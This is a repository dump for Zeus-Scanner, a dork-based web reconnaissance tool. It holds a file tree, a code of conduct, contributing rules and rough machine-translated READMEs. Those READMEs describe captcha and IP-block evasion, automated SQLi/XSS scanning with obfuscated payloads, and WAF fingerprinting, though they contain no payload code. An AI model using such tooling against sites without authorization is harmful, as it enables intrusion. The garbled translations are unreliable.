├── .github
├── CODE_OF_CONDUCT.md
├── CONTRIBUTING.md
├── ISSUE_TEMPLATE.md
├── LICENSE.md
└── translations
│ ├── README-french.md
│ ├── README-russian.md
│ └── README-spanish.md
├── .gitignore
├── Dockerfile
├── README.md
├── bin
├── __init__.py
├── drivers
│ ├── geckodriver-v0.17.0-linux32.tar.gz
│ ├── geckodriver-v0.17.0-linux64.tar.gz
│ ├── geckodriver-v0.18.0-linux32.tar.gz
│ ├── geckodriver-v0.18.0-linux64.tar.gz
│ ├── geckodriver-v0.19.0-linux32.tar.gz
│ └── geckodriver-v0.19.0-linux64.tar.gz
└── unzip_gecko.py
├── etc
├── auths
│ ├── git_auth
│ └── whois_auth
├── checksum
│ └── md5sum.md5
├── deprecated
│ └── intel_me
│ │ └── __init__.py
├── html
│ └── clickjacking_test_page.html
├── scripts
│ ├── cleanup.sh
│ ├── fix_pie.sh
│ ├── install_nmap.sh
│ ├── install_xvfb.sh
│ ├── launch_sqlmap.sh
│ └── reinstall.sh
├── text_files
│ ├── agents.txt
│ ├── dorks.txt
│ ├── link_ext.txt
│ └── xss_payloads.txt
└── xml
│ └── headers.xml
├── lib
├── __init__.py
├── attacks
│ ├── __init__.py
│ ├── admin_panel_finder
│ │ └── __init__.py
│ ├── clickjacking_scan
│ │ └── __init__.py
│ ├── nmap_scan
│ │ ├── __init__.py
│ │ └── nmap_opts.py
│ ├── sqlmap_scan
│ │ ├── __init__.py
│ │ └── sqlmap_opts.py
│ ├── whois_lookup
│ │ ├── __init__.py
│ │ └── whois.py
│ └── xss_scan
│ │ └── __init__.py
├── core
│ ├── __init__.py
│ ├── common.py
│ ├── decorators.py
│ ├── errors.py
│ ├── parse.py
│ └── settings.py
├── firewall
│ ├── __init__.py
│ ├── akamai.py
│ ├── anquanbao.py
│ ├── armor.py
│ ├── aws.py
│ ├── bigip.py
│ ├── cloudflare.py
│ ├── cloudfront.py
│ ├── dw.py
│ ├── fortigate.py
│ ├── generic.py
│ ├── modsecurity.py
│ ├── paloalto.py
│ ├── pk.py
│ ├── powerful.py
│ ├── siteguard.py
│ ├── sonicwall.py
│ ├── squid.py
│ ├── stringray.py
│ ├── sucuri.py
│ ├── urlscan.py
│ ├── varnish.py
│ ├── wallarm.py
│ ├── webknight.py
│ ├── webseal.py
│ ├── wordfence.py
│ ├── yundun.py
│ └── yunsuo.py
├── header_check
│ └── __init__.py
├── plugins
│ ├── 1024.py
│ ├── 360.py
│ ├── 3com.py
│ ├── 3dcart.py
│ ├── 4d.py
│ ├── 4images.py
│ ├── 68classified.py
│ ├── __init__.py
│ ├── aardvark.py
│ ├── abyss.py
│ ├── accellion.py
│ ├── atomfeed.py
│ ├── b2evolution.py
│ ├── bmcremedy.py
│ ├── bomgar.py
│ ├── clipbucket.py
│ ├── googleapi.py
│ ├── html5.py
│ ├── ihtml.py
│ ├── jquery.py
│ ├── moodle.py
│ ├── mssqlreportmanager.py
│ ├── opengraph.py
│ ├── openxchange.py
│ └── rssfeed.py
└── tamper_scripts
│ ├── __init__.py
│ ├── appendnull_encode.py
│ ├── base64_encode.py
│ ├── enclosebrackets_encode.py
│ ├── hex_encode.py
│ ├── lowercase_encode.py
│ ├── multispace2comment_encode.py
│ ├── obfuscateentity_encode.py
│ ├── obfuscateordinal_encode.py
│ ├── randomcase_encode.py
│ ├── space2comment_encode.py
│ ├── space2null_encode.py
│ ├── unicode_encode.py
│ ├── uppercase_encode.py
│ └── url_encode.py
├── requirements.txt
├── var
├── __init__.py
├── auto_issue
│ ├── __init__.py
│ └── github.py
├── blackwidow
│ └── __init__.py
└── search
│ ├── __init__.py
│ ├── pgp_search.py
│ └── selenium_search.py
└── zeus.py
/.github/CODE_OF_CONDUCT.md:
--------------------------------------------------------------------------------
1 | # Contributor Covenant Code of Conduct
2 |
3 | ## Our Pledge
4 |
5 | In the interest of fostering an open and welcoming environment, we as
6 | contributors and maintainers pledge to making participation in our project and
7 | our community a harassment-free experience for everyone, regardless of age, body
8 | size, disability, ethnicity, gender identity and expression, level of experience,
9 | nationality, personal appearance, race, religion, or sexual identity and
10 | orientation.
11 |
12 | ## Our Standards
13 |
14 | Examples of behavior that contributes to creating a positive environment
15 | include:
16 |
17 | * Using welcoming and inclusive language
18 | * Being respectful of differing viewpoints and experiences
19 | * Gracefully accepting constructive criticism
20 | * Focusing on what is best for the community
21 | * Showing empathy towards other community members
22 |
23 | Examples of unacceptable behavior by participants include:
24 |
25 | * The use of sexualized language or imagery and unwelcome sexual attention or
26 | advances
27 | * Trolling, insulting/derogatory comments, and personal or political attacks
28 | * Public or private harassment
29 | * Publishing others' private information, such as a physical or electronic
30 | address, without explicit permission
31 | * Other conduct which could reasonably be considered inappropriate in a
32 | professional setting
33 |
34 | ## Our Responsibilities
35 |
36 | Project maintainers are responsible for clarifying the standards of acceptable
37 | behavior and are expected to take appropriate and fair corrective action in
38 | response to any instances of unacceptable behavior.
39 |
40 | Project maintainers have the right and responsibility to remove, edit, or
41 | reject comments, commits, code, wiki edits, issues, and other contributions
42 | that are not aligned to this Code of Conduct, or to ban temporarily or
43 | permanently any contributor for other behaviors that they deem inappropriate,
44 | threatening, offensive, or harmful.
45 |
46 | ## Scope
47 |
48 | This Code of Conduct applies both within project spaces and in public spaces
49 | when an individual is representing the project or its community. Examples of
50 | representing a project or community include using an official project e-mail
51 | address, posting via an official social media account, or acting as an appointed
52 | representative at an online or offline event. Representation of a project may be
53 | further defined and clarified by project maintainers.
54 |
55 | ## Enforcement
56 |
57 | Instances of abusive, harassing, or otherwise unacceptable behavior may be
58 | reported by contacting the project team at zeus.dork.scanner@gmail.com. All
59 | complaints will be reviewed and investigated and will result in a response that
60 | is deemed necessary and appropriate to the circumstances. The project team is
61 | obligated to maintain confidentiality with regard to the reporter of an incident.
62 | Further details of specific enforcement policies may be posted separately.
63 |
64 | Project maintainers who do not follow or enforce the Code of Conduct in good
65 | faith may face temporary or permanent repercussions as determined by other
66 | members of the project's leadership.
67 |
68 | ## Attribution
69 |
70 | This Code of Conduct is adapted from the [Contributor Covenant][homepage], version 1.4,
71 | available at https://www.contributor-covenant.org/version/1/4/code-of-conduct.html
72 |
73 | [homepage]: https://www.contributor-covenant.org
74 |
--------------------------------------------------------------------------------
/.github/CONTRIBUTING.md:
--------------------------------------------------------------------------------
1 | # Contributions to Zeus
2 |
3 | ## Bugs!!
4 |
5 | Bug reports are welcome! Please report all bugs to the [Issue Tracker](https://github.com/Ekultek/Zeus-Scanner/issues) by clicking the link and hitting `New Issue`. Zeus will prompt you to automatically create a issue if it hits an unexpected exception. To do it manually please follow the details below.
6 |
7 | ### Bug report guidelines
8 |
9 | - Before you create a bug report, make sure that the bug has not already been reported by checking the [open](https://github.com/Ekultek/Zeus-Scanner/issues?q=is%3Aopen+is%3Aissue) and [closed](https://github.com/Ekultek/Zeus-Scanner/issues?q=is%3Aissue+is%3Aclosed) issues.
10 | - You can also check if you can answer your own question by looking at the [user manual](https://github.com/Ekultek/Zeus-Scanner/wiki/User-Guide)
11 | - Do a `python zeus.py --update` and try to reproduce the bug with the latest version
12 | - You will need to make sure that your report has detailed information, this includes (but not limited to):
13 | - The dork you used when you tried you received the error
14 | - Your running context (`clone`, `zip`, etc..)
15 | - Your operating system
16 | - The commands passed
17 | - Log file information that is relevant
18 | - Full stacktrace error
19 |
20 | # Pull requests and code changes
21 |
22 | All pull requests will be fully evaluated and taken seriously, no matter how small the change. To open a pull request you will need to do the following:
23 | - Clone the repository with `git clone https://github.com/ekultek/zeus-scanner.git`
24 | - Read the [user manual](https://github.com/Ekultek/Zeus-Scanner/wiki/User-Guide) carefully and make sure you understand what's going on
25 | - Do your code changes with your favorite editor
26 | - Send a pull request via Github
27 |
28 | ### Pull request guidelines
29 |
30 | - Each pull request should have at least one logical change
31 | - Porting to compatibility with `python 3` is allowed and welcomed
32 | - Use spaces not tabs please
33 |
34 | If I consistently see that you are creating clean and great functional pull requests, we can discuss the possibility of getting push access to the repository.
35 |
36 | # Licensing
37 |
38 | By submitting code contributions to Zeus or via Git pull request, checking them into the Zeus's source code repository, it is understood (unless you specify otherwise) that you are offering the Zeus copyright holders the unlimited, non-exclusive right to reuse, modify, and relicense the code. This is important because the inability to relicense code has caused devastating problems for other software projects (such as KDE and NASM). If you wish to specify special license conditions of your contributions, just say so when you send them.
--------------------------------------------------------------------------------
/.github/ISSUE_TEMPLATE.md:
--------------------------------------------------------------------------------
1 | # What's the problem
2 |
3 |
4 | # Running context
5 |
6 | - Operating system:
7 |
8 | - Zeus version:
9 |
10 | # Any idea on a solution?
11 |
12 |
13 | # Full console commands run
14 |
15 |
16 | # Stacktrace (if applicable)
17 |
18 |
19 | # Full file log information
20 |
--------------------------------------------------------------------------------
/.github/LICENSE.md:
--------------------------------------------------------------------------------
1 | Zeus-Scanner Advanced Dork Scanning Tool
2 | Copyright (C) 2017 Thomas Perkins (Ekultek)
3 |
4 | This program is free software: you can redistribute it and/or modify
5 | it under the terms of the GNU General Public License as published by
6 | the Free Software Foundation, either version 3 of the License, or
7 | (at your option) any later version.
8 |
9 | This program is distributed in the hope that it will be useful,
10 | but WITHOUT ANY WARRANTY; without even the implied warranty of
11 | MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
12 | GNU General Public License for more details.
13 |
14 | You should have received a copy of the GNU General Public License
15 | along with this program. If not, see .
--------------------------------------------------------------------------------
/.github/translations/README-french.md:
--------------------------------------------------------------------------------
1 | [](https://github.com/ekultek/zeus-scanner/stargazers)
2 | [](https://github.com/ekultek/zeus-scanner/network)
3 | [](https://github.com/ekultek/zeus-scanner/issues)
4 | [](https://raw.githubusercontent.com/Ekultek/Zeus-Scanner/master/.github/LICENSE.md)
5 | [](https://twitter.com/Zeus_Scanner)
6 | [](https://github.com/Ekultek/Zeus-Scanner#donations)
7 |
8 | # Annuaire des liens utiles
9 |
10 | - [Qu'estce que Zeus](https://github.com/Ekultek/Zeus-Scanner#zeus-scanner)
11 | - [Les caractéristiques de Zeus](https://github.com/Ekultek/Zeus-Scanner#features)
12 | - [Exigences et installation](https://github.com/Ekultek/Zeus-Scanner#requirements)
13 | - [Ubuntu/Debian](https://github.com/Ekultek/Zeus-Scanner#ubuntudebian)
14 | - [centOS](https://github.com/Ekultek/Zeus-Scanner#centos)
15 | - [autre](https://github.com/Ekultek/Zeus-Scanner#others)
16 | - [Capturesécran](https://github.com/Ekultek/Zeus-Scanner#screenshots)
17 | - [vidéo Demo](https://vimeo.com/239885768)
18 | - [manuel d'utilisation](https://github.com/Ekultek/Zeus-Scanner/wiki)
19 | - [Comment fonctionne Zeus](https://github.com/Ekultek/Zeus-Scanner/wiki/How-Zeus-works)
20 | - [Fonctionnalité](https://github.com/Ekultek/Zeus-Scanner/wiki/Functionality)
21 | - [Passant drapeaux sqlmap avec Zeus](https://github.com/Ekultek/Zeus-Scanner/wiki/Passing-flags-to-sqlmap)
22 | - [Informations légales](https://github.com/Ekultek/Zeus-Scanner/tree/master/.github)
23 | - [Licence (GPL)](https://github.com/Ekultek/Zeus-Scanner/blob/master/.github/LICENSE.md)
24 | - [Code de conduite](https://github.com/Ekultek/Zeus-Scanner/blob/master/.github/CODE_OF_CONDUCT.md)
25 | - [Signaler un bug](https://github.com/Ekultek/Zeus-Scanner/issues/new)
26 | - [Ouvrir une demande de traction](https://github.com/Ekultek/Zeus-Scanner/compare)
27 | - [lignes directrices de contribution](https://github.com/Ekultek/Zeus-Scanner/blob/master/.github/CONTRIBUTING.md)
28 | - [Dons à Zeus](https://github.com/Ekultek/Zeus-Scanner#donations)
29 | - [Shoutouts](https://github.com/Ekultek/Zeus-Scanner#shoutouts)
30 |
31 | # Zeus-Scanner
32 |
33 | ### Qu'estce que Zeus?
34 |
35 | Zeus est un utilitaire de reconnaissance avancée conçue pour rendreapplication web simple de reconnaissance. Zeus est livré avec une puissante compatibilité intégrée dansmoteur,moteur de recherche multiple analyse syntaxique URL, la capacité d'extraireURL des deux URL interdiction et WebCache, la possibilité d'exécuter plusieurs évaluations devulnérabilité sur la cible, et estmesure de contournermoteur de recherche captchas.
36 |
37 | ### Caractéristiques
38 |
39 | - Un puissant construit dansmoteur d'analyse syntaxique URL
40 | - compatibilité des moteurs de recherche multiples (`DuckDuckGo`,` AOL`, `Bing`et` défaut est `Google`Google`)
41 | - Possibilité d'extraire l'URL de l'URL d'interdiction de Google contournant ainsiblocs IP
42 | - Possibilité d'extraire l'URL de webcache Google
43 | - compatibilité proxy (`http`,` https`, `socks4`,` socks5`)
44 | - compatibilité proxy Tor etémulation de navigateur Tor
45 | - Parse `robots.txt`/`plansite .xml` et les enregistrer dans un fichier
46 | - évaluations devulnérabilité multiples (XSS, SQLi, clickjacking, balayageports, panneau d'administration découverte,recherches whois et plus)
47 | - sabotage scripts pour occultent XSS charges utiles
48 | - Peut fonctionner avec un agent utilisateurdéfaut personnalisé ,un des plus4000 agents-utilisateurshasard, ou un agent utilisateur personnel
49 | - création d'émission automatique lorsqu'une erreur inattendue survient
50 | - Capacité d'analyser une page Web et tirer tous les liens
51 | - Peut exécuter un dork singulier, dorks multiples dans un fichier donné, ou un dorkhasard dans une liste de plus5000 dorks soigneusement étudiés
52 | - dork listes noires lorsque passites se trouvent à la requête de recherche, va enregistrer la requête dans un fichier liste noire
53 | - Identifierprotection WAF / IPS / IDS de plus20 différents parefeu
54 | - énumération de protectiontête pour vérifier quel type de protection est assurée partêtes HTTP
55 | - enregistrementcookies,têtes etautres informations vitales pourfichiers journaux
56 | - et bien plus encore ...
57 |
58 | ### Capturesécran
59 |
60 | Exécution sans options obligatoires, ouexécuter le --help` `drapeauva afficher le menu d'aide de Zeus:
61 | [zeus-help](https://user-images.githubusercontent.com/14183473/30176257-63391c62-93c7-11e7-94d7-68fde7818381.png)
62 |
63 | un dorkbase avec le `balayage-d`, drapeau du dork donné lancera un navigateur automatisé et tirer le Google résultats page:
64 | [zeus-dork-scan](https://user-images.githubusercontent.com/14183473/30176252-618b191a-93c7-11e7-84d2-572c12994c4d.png)
65 |
66 | Appeler le `-s` drapeauvous demandera vous de démarrer le serveur API sqlmap `python sqlmapapi.py -s` de sqlmap, il va alorsconnecter à l'API et effectuer une analyse de sqlmap sur les URL trouvées.
67 | [zeus-sqlmap-api](https://user-images.githubusercontent.com/14183473/30176259-6657b304-93c7-11e7-81f8-0ed09a6c0268.png)
68 |
69 | Vous pouvez voir pluscapturesécran [ici](https://github.com/Ekultek/Zeus-Scanner/wiki/Screenshots)
70 |
71 | ###[Demo!
72 |
73 | [](https://vimeo.com/239885768)
74 |
75 | ### exigences
76 |
77 | Il y a des exigences pourcela soit exécutésuccès.
78 |
79 | ##### Exigencesbase
80 |
81 | - `libxml2-dev`,` libxslt1-dev`, `python-dev` sont nécessaires pour le processus d'installation
82 | - navigateur web Firefox est nécessairepartir de maintenant, vous aurez besoin Firefox version`<= 57 > = 51` (entre 51 et 57).fonctionnalité complète pourautres navigateurs seront ajoutées.
83 | - Si vous voulez exécuter sqlmaptravers vous aurez besoin d'sqlmap quelque part de l'URL sur votre système.
84 | - Si vous voulez exécuter un port numérisationaide nmap sur les adresses IP de l'URL. Vous aurez besoin nmap sur votre système.
85 | - [Geckodriver](https://github.com/mozilla/geckodriver)est nécessaire pour exécuter le navigateur Web Firefox et sera installé la première foisvous exécutez. Il sera ajouté à votre `/ usr / bin` afin qu'il puisse être exécuté dans votre ENV PATH.
86 | - Vous devez être `sudo` pour la première foiscoursexécutioncette façon que vous pouvez ajouter le pilote à votre PATH, vous devrez peutêtre exécutertant que`sudo` fonction de vos autorisations. _REMARQUE:_ `fonction des autorisationsvous devrez peutêtre pour toute exécution sudo impliquant le geckodriver`
87 | -` xvfb` est requis par `pyvirtualdisplay`,il sera installécasinstallation sur votre premier run
88 |
89 | ##### package Python exigences
90 |
91 | - [sélénium WebDriver](http://www.seleniumhq.org/projects/webdriver/)paquet est nécessaire pour automatiser les appels API de navigateur Web et bypass.
92 | - [demandes](http://docs.python-requests.org/en/master/)paquet est nécessaire pourconnecter à l'URL, et l'API sqlmap
93 | - [-nmap python](http://xael.org/pages/python-nmap-fr.html)paquet est nécessaire pour exécuter nmap sur les adresses IP de l'URL
94 | - [Whichcraft](https://github.com/spookyowl/witchcraft)package est nécessaire pour vérifier si nmap et sqlmap sont sur votre système si vous voulez les utiliser
95 | - [pyvirtualdisplay](https://pyvirtualdisplay.readthedocs.io/en/latest/)package est nécessaire pour masquer l'affichage du navigateur touttrouvant l'URL de recherche
96 | - [lxml](https://lxml.readthedocs.io/fr/latest/)est nécessaire pour analyserdonnées XML pour le plansite etenregistrertant que tel
97 | - [psutil](https://github.com/giampaolo/psutil)est nécessaire pour rechercherexécutionsessions API sqlmap
98 | - [beautifulsoup](https://www.crummy.com/software/BeautifulSoup/bs4/doc/)est nécessaire pour tirer toutes les balises de descripteur HREF et analyser le code HTML dans une syntaxe facilement réalisable
99 |
100 | ### Installation
101 |
102 | Vous pouvez télécharger le dernière [tar.gz](https://github.com/ekultek/zeus-scanner/tarball/master),le dernier [zip](https://github.com/ekultek/zeus-scanner/zipball/master),ou vous pouvez trouver le courant version stable [ici](https://github.com/Ekultek/Zeus-Scanner/releases).Sinonvous pouvez installer la dernière version de développement en suivant les instructions qui correspondentmieux à votre système d'exploitation:
103 |
104 | ** _NOTE: (facultatif mais fortement conseillé)_ ** ajouter sqlmap et nmap à votre environnement PATH en les déplaçant vers `/usr/bin `ouen les ajoutant au PATH viaterminal
105 |
106 | ##### Ubuntu/Debian
107 |
108 | ```
109 | sudo apt-get install libxml2-dev libxslt1-dev python-dev && git clone https://github.com/ekultek/zeus-scanner.git && cd zeus-scanner && sudo pip2 install -r requirements.txt && sudo python zeus.py
110 | ```
111 |
112 | ##### centOS
113 |
114 | ```
115 | sudo apt-get install gcc python-devel libxml2-dev libxslt1-dev python-dev && git clone https://github.com/ekultek/zeus-scanner.git && cd zeus-scanner && sudo pip2 install -r requirements.txt && sudo python zeus.py
116 | ```
117 |
118 | ##### Others
119 |
120 | ```
121 | sudo apt-get install libxml2-dev libxslt1-dev python-dev && git clone https://github.com/ekultek/zeus-scanner.git && cd zeus-scanner && sudo pip2 install -r requirements.txt && sudo python zeus.py
122 | ```
123 |
124 | Celainstallera tous les Packa exigences ge ainsi que les geckodriver
125 |
126 |
127 | ### Dons
128 |
129 | Zeus est créé par une petite équipe de développeurs qui ont une aspiration àsécurité deinformation et cherchent à réussir. Si vous aimez Zeus etvous voulez fairedon à notre financement, nous acceptons avec plaisir et appréciateur dons via:
130 |
131 | - Bitcoin (BTC): `3DAQGcAQ194NGVs16Mmv75ip45CVuE8cZy`
132 | - [PayPal](https://www.paypal.me/ZeusScanner)
133 | - Vous pouvez [Achètenous un café](https://ko-fi.com/A28355P5)
134 |
135 | vous pouvez être assuré que tousdons serviront au financementZeus pourrendre plus fiable et mieux encore, merci de l'équipe de développement Zeus
136 |
137 | ### Shoutouts
138 |
139 | ##### [OpenSource Projets](https://www.facebook.com/opensourceprojects/)
140 |
141 | OpenSource Projects est une page communautaire Facebook qui abut est de donnerdéveloppeurs, nouveaux et anciens, un endroit facile et simple de partager leur contributions opensource etprojets. Personnellementje pensec'est une idée géniale, je sais combien il est difficile d'obtenir votre code remarqué pargens et soutenir ces garslà100%. Allezy et leur donner un comme [ici](https://www.facebook.com/opensourceprojects/).Ils partageront tout projet opensourcevous leur envoyez gratuitement. Merci projets OpenSource pour donnerdéveloppeurs un endroit pour partagertravail avec un autre!
142 |
143 |
--------------------------------------------------------------------------------
/.github/translations/README-russian.md:
--------------------------------------------------------------------------------
1 | [](https://github.com/ekultek/zeus-scanner/stargazers)
2 | [](https://github.com/ekultek/zeus-scanner/network)
3 | [](https://github.com/ekultek/zeus-scanner/issues)
4 | [](https://raw.githubusercontent.com/Ekultek/Zeus-Scanner/master/.github/LICENSE.md)
5 | [](https://twitter.com/Zeus_Scanner)
6 | [](https://github.com/Ekultek/Zeus-Scanner#donations)
7 |
8 | # Полезные ссылки каталог
9 |
10 | - [Что такое Зевс](https://github.com/Ekultek/Zeus-Scanner#zeus-scanner)
11 | - [Зевса е нкции](https://github.com/Ekultek/Zeus-Scanner#features)
12 | - [Требования и установка](https://github.com/Ekultek/Zeus-Scanner#requirements)
13 | - [Ubuntu / Debian](https://github.com/Ekultek/Zeus-Scanner#ubuntudebian)
14 | - [CentOS](https://github.com/Ekultek/Zeus-Scanner#centos)
15 | - [другие](https://github.com/Ekultek/Zeus-Scanner#others)
16 | - [Скриншоты](https://github.com/Ekultek/Zeus-Scanner#screenshots)
17 | - [Demo видео](https://vimeo.com/239885768)
18 | - [инструкцияэксплуатации](https://github.com/Ekultek/Zeus-Scanner/wiki)
19 | - [Как Зевс работает](https://github.com/Ekultek/Zeus-Scanner/wiki/How-Zeus-works)
20 | - [Функциональность](https://github.com/Ekultek/Zeus-Scanner/wiki/Functionality)
21 | - [Передача sqlmap флаги с Зевсом](https://github.com/Ekultek/Zeus-Scanner/wiki/Passing-flags-to-sqlmap)
22 | - [Правовая информация](https://github.com/Ekultek/Zeus-Scanner/tree/master/.github)
23 | - [License (GPL)](https://github.com/Ekultek/Zeus-Scanner/blob/master/.github/LICENSE.md)
24 | - [Кодекс поведения](https://github.com/Ekultek/Zeus-Scanner/blob/master/.github/CODE_OF_CONDUCT.md)
25 | - [Сообщить об ошибке](https://github.com/Ekultek/Zeus-Scanner/issues/new)
26 | - [Открыть запрос нагрузочный](https://github.com/Ekultek/Zeus-Scanner/compare)
27 | - [руководящие принципы](https://github.com/Ekultek/Zeus-Scanner/blob/master/.github/CONTRIBUTING.md)
28 | - [Пожертвования Зевса](https://github.com/Ekultek/Zeus-Scanner#donations)
29 | - [Shoutouts](https://github.com/Ekultek/Zeus-Scanner#shoutouts)
30 |
31 | # Zeus-сканер
32 |
33 | ### Что такое Зевс?
34 |
35 | Зевс является утилитой разведки разработаночтобы сделать вебприложения разведывательный просто. Зевс поставляетсякомплекте с мощным встроенным URL разбора двигателя, множественная совместимости двигателя поиска, возможность извлечения URLадреса из обоих запрета и Webcache URLадресов, возможность запуска нескольких оценок уязвимости на цели, и может обойти каптч поисковой системы.
36 |
37 | ### Особенности
38 |
39 | - мощная встроенная в URL разбора двигателя
40 | - Совместимость Multiple поисковой системы (`DuckDuckGo`,` AOL`, `Bing`и` Google` умолчанию является `Google`)
41 | - Возможность извлечения URL из запрета URLGoogle обходя таким образом IPблоки
42 | - Возможность извлекать из Webcache URLGoogle
43 | - проксисовместимость (`http`,` https`, `socks4`,` socks5`)
44 | - совместимостьпроксиTor и эмуляция Tor браузера
45 | - Разбираем `robots.txt`/`Карта сайта.xml` и сохранить их в файл
46 | - оценки Множественные уязвимости (XSS, SQLI, ClickJacking, сканирование портов, админка находкой, Whois поиски, и многое другое)
47 | - тампера скрипты запутать XSS полезных нагрузок
48 | - Может работать с настраиваемойумолчанию агент пользователя , один из более чем 4000 случайных пользовательских агентов или личного агента пользователя
49 | - Автоматическое создание проблемыкогда возникает неожиданная ошибка
50 | - Возможность сканировать вебстраницу и вытащить все ссылки
51 | - Может работать уникальный мужлан, несколько Dorks в данном файл, или случайный придурок из списка более 5000 тщательно исследовал Dorks
52 | - Dork черный списоккогда сайты не найдены с поисковым запросом, будет сохранить запрос в черный список файлов
53 | - Определение WAF / IPS / защита IDS более 20 различных брандмауэров
54 | - защита перечисления заголовка для проверкичто вид защиты обеспечиваетсяпомощью HTTP заголовков
55 | - Сохранение куки, заголовков и другая необходимая информация в логфайлы
56 | - и многое другое ...
57 |
58 | ### Скриншоты
59 |
60 | Запуск без обязательных опций, или запустив `--help` флаг будет выводить меню помощи Зевса:
61 | [Zeus-помощь](https://user-images.githubusercontent.com/14183473/30176257-63391c62-93c7-11e7-94d7-68fde7818381.png)
62 |
63 | основной мужлан сканирование с `-d` флагом, из данного мужлана запустит автоматизированную браузер и тянуть Google результаты страницы:
64 | [Zeus-мужлан-сканирования](https://user-images.githubusercontent.com/14183473/30176252-618b191a-93c7-11e7-84d2-572c12994c4d.png)
65 |
66 | Вызов `-s` флаг запросит вы начать API сервера sqlmap `питон sqlmapapi.py -s` из sqlmap, он будет подключаться к API и выполнить sqlmap сканирование на найденный URL.
67 | [Zeus-sqlmap-апи](https://user-images.githubusercontent.com/14183473/30176259-6657b304-93c7-11e7-81f8-0ed09a6c0268.png)
68 |
69 | Вы можете увидеть больше скриншотов [здесь](https://github.com/Ekultek/Zeus-Scanner/wiki/Screenshots)
70 |
71 | ### Demo
72 |
73 | [](https://vimeo.com/239885768)
74 |
75 | ### требования
76 |
77 | Есть некоторые требования для этогочтобы быть успешно работать.
78 |
79 | ##### Основные требования
80 |
81 | - `libxml2-dev`,` libxslt1-dev`, `питон-dev` необходимы для процесса установки
82 | - веббраузер Firefox требуется как сейчас, вы будете нуждатьсяFirefox версии`<= 57 > = 51` (между 51 и 57).конечном итоге будет добавлена полная функциональность для других браузеров.
83 | - Если вы хотите запустить sqlmap через вам нужно будет sqlmap URLгдето в вашей системе.
84 | - Если вы хотите запустить сканирование портовпомощью Nmap по IPадресов URL. Вы будете нуждатьсяNmap в вашей системе.
85 | - [Geckodriver](https://github.com/mozilla/geckodriver)требуется для запуска веббраузера Firefox и будет установлен в первый раз при запуске. Он будет добавлен к вашему `/ USR / bin` так что он может быть запущен в вашем ENV PATH.
86 | - Вы должны быть `sudo` впервые работает это такчто вы можете добавить драйвер в PATH, вы можете также должны работать как`sudo` зависимости от ваших прав. _ПРИМЕЧАНИЕ:_ `зависимости от прав доступа может потребоваться быть Суда для любого бегаучастием geckodriver`
87 | -` xvfb` требуется на `pyvirtualdisplay`,он будет установленесли не установлен на вашемпервого запуска
88 |
89 | пакете Python##### требования
90 |
91 | - [селен WebDriver](http://www.seleniumhq.org/projects/webdriver/)пакет требуется для автоматизации веббраузер и перепускной API вызовов.
92 | - [запросы](http://docs.python-requests.org/en/master/)пакет требуется для подключения к URLадресу, а sqlmap API
93 | - [питон-птар](http://xael.org/страницы /питон-птар-en.html)пакет требуется для запуска Nmap по IPадресам URL,
94 | - [whichcraft](https://github.com/spookyowl/witchcraft)пакет требуетсячтобы проверитьесли птар и sqlmap находятся на вашем системыесли вы хотите использовать их
95 | - [pyvirtualdisplay](https://pyvirtualdisplay.readthedocs.io/en/latest/)пакет требуетсячтобы скрыть экран браузеравремя нахождения поиска URL
96 | - [LXML](https:// LXML .readthedocs.io / о / последние/)требуется для анализа данных XML длясайта и сохранить его как таковые
97 | - [psutil](https://github.com/giampaolo/psutil)требуется для поиска работы sqlmap сессий API
98 | - [BeautifulSoup](https://www.crummy.com/software/BeautifulSoup/bs4/doc/)требуетсячтобы вытащить все тег дескриптора HREF и разбор HTML в легко работоспособный синтаксисе
99 |
100 | ### Установку
101 |
102 | Вы можете скачать последняя [tar.gz](https://github.com/ekultek/zeus-scanner/tarball/master),последняя [застежкамолния](https://github.com/ekultek/zeus-scanner/zipball/master),или вы можете найти ток стабильный релиз [здесь](https://github.com/Ekultek/Zeus-Scanner/releases).альтернативы вы можете установить последнюю версию развития, следуя инструкциикоторые наилучшимсоответствуют вашей операционной системе:
103 |
104 | ** _Примечание: (обязательноно настоятельно рекомендуется)_ ** добавить sqlmap и Nmap в вашу среде PATH, перемещая их в `/ USR / бен `илипутем добавления их в PATH через терминал
105 |
106 | ##### Ubuntu/Debian
107 |
108 | ```
109 | sudo apt-get install libxml2-dev libxslt1-dev python-dev && git clone https://github.com/ekultek/zeus-scanner.git && cd zeus-scanner && sudo pip2 install -r requirements.txt && sudo python zeus.py
110 | ```
111 |
112 | ##### centOS
113 |
114 | ```
115 | sudo apt-get install gcc python-devel libxml2-dev libxslt1-dev python-dev && git clone https://github.com/ekultek/zeus-scanner.git && cd zeus-scanner && sudo pip2 install -r requirements.txt && sudo python zeus.py
116 | ```
117 |
118 | ##### Others
119 |
120 | ```
121 | sudo apt-get install libxml2-dev libxslt1-dev python-dev && git clone https://github.com/ekultek/zeus-scanner.git && cd zeus-scanner && sudo pip2 install -r requirements.txt && sudo python zeus.py
122 | ```
123 |
124 | Этоустановит всеM. Требования GE вместе с geckodriver
125 |
126 |
127 | ### Пожертвования
128 |
129 | Zeus создается небольшой группой разработчиков, у которых есть стремление к информационной безопасности и стремятся добиться успеха. Если вы хотите Зевс и хотите пожертвовать наше финансирование, мырадостью и благодарностью принимаем пожертвование через:
130 |
131 | - Bitcoin (BTC): `3DAQGcAQ194NGVs16Mmv75ip45CVuE8cZy`
132 | - [PayPal](https://www.paypal.me/ZeusScanner)
133 | - Или вы можете [купить нам кофе](https://ko-fi.com/A28355P5)
134 |
135 | Вы можете быть уверенычто все пожертвования пойдут на финансирование Зевсачтобы сделать его более надежным и даже лучше, спасибо от команды разработчиков Zeus
136 |
137 | ### Shoutouts
138 |
139 | ##### [OpenSource проекты](https://www.facebook.com/opensourceprojects/)
140 |
141 | OpenSource проекты это страница Facebook сообществакто цель состоитчтобы дать разработчикам, новые и старые, а легко и просто месточтобы разделить их вклад OpenSource и проекты. Я лично считаюэто огромная идея, я знаюкак трудно получить код заметил людьми и поддерживает эти ребята100%. Идите вперед и дать им как [здесь](https://www.facebook.com/opensourceprojects/).Они будут делиться любой проектоткрытым исходным кодом вы отправить их бесплатно. Спасибо OpenSource проектов для предоставления разработчикам место для обмена работу друг с другом!
142 |
143 |
--------------------------------------------------------------------------------
/.github/translations/README-spanish.md:
--------------------------------------------------------------------------------
1 | [](https://github.com/ekultek/zeus-scanner/stargazers)
2 | [](https://github.com/ekultek/zeus-scanner/network)
3 | [](https://github.com/ekultek/zeus-scanner/issues)
4 | [](https://raw.githubusercontent.com/Ekultek/Zeus-Scanner/master/.github/LICENSE.md)
